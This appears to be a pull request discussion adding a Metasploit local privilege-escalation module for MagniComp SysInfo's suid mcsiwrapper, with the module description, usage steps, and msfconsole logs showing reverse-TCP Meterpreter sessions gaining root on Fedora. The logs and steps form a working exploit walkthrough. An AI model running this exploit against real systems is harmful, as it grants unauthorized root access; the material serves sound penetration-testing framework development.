Add MagniComp SysInfo mcsiwrapper Privilege Escalation exploit

[bcoles]

Add MagniComp SysInfo mcsiwrapper Privilege Escalation exploit.

        This module attempts to gain root privileges on systems running
        MagniComp SysInfo versions prior to 10-H64.

        The .mcsiwrapper suid executable allows loading a config file using the
        '--configfile' argument. The 'ExecPath' config directive is used to set
        the executable load path. This module abuses this functionality to set
        the load path resulting in execution of arbitrary code as root.

        This module has been tested successfully with SysInfo version
        10-H63 on Fedora 20 x86_64 and 10-GA on Solaris 10u11 x86.

Verification

• Start msfconsole
• Get a session
• use use multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc
• set SESSION <ID>
• run
• Verify you get a root session

Example Output

msf > use exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc
msf exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > set session 1
session => 1
msf exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.244:4444
[*] Using target: Linux
[*] Writing '/tmp/.0rk4PC/vFdxxuBVkh' (21 bytes) ...
[*] Writing '/tmp/.0rk4PC/eoGVzYwGa' (207 bytes) ...
[*] Executing payload...
[*] Sending stage (857352 bytes) to 172.16.191.137
[*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.137:42229) at 2018-02-05 07:38:35 -0500
[+] Deleted /tmp/.0rk4PC/vFdxxuBVkh
[+] Deleted /tmp/.0rk4PC/eoGVzYwGa
[+] Deleted /tmp/.0rk4PC

meterpreter > getuid
Server username: uid=0, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Fedora 20 (Linux 3.19.8-100.fc20.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >

[Chiggins]

If anyone doesn't mind, I'm going to self assign for my first PR as a committer. 💯

[busterb]

Go for it!

[Chiggins]

Tested against Fedora 27 and it worked like a charm!

msf5 exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > run

[*] Started reverse TCP handler on 192.168.1.252:4445 
[*] Using target: Linux
[*] Writing '/tmp/.Duxko1/9M2WGR' (21 bytes) ...
[*] Writing '/tmp/.Duxko1/zuc5EBYz' (207 bytes) ...
[*] Executing payload...
[*] Sending stage (857352 bytes) to 192.168.1.162

meterpreter > sysinfo 
Computer     : fedora27.chigs.local
OS           : Fedora 27 (Linux 4.13.9-300.fc27.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > getuid 
Server username: uid=0, gid=1000, euid=0, egid=1000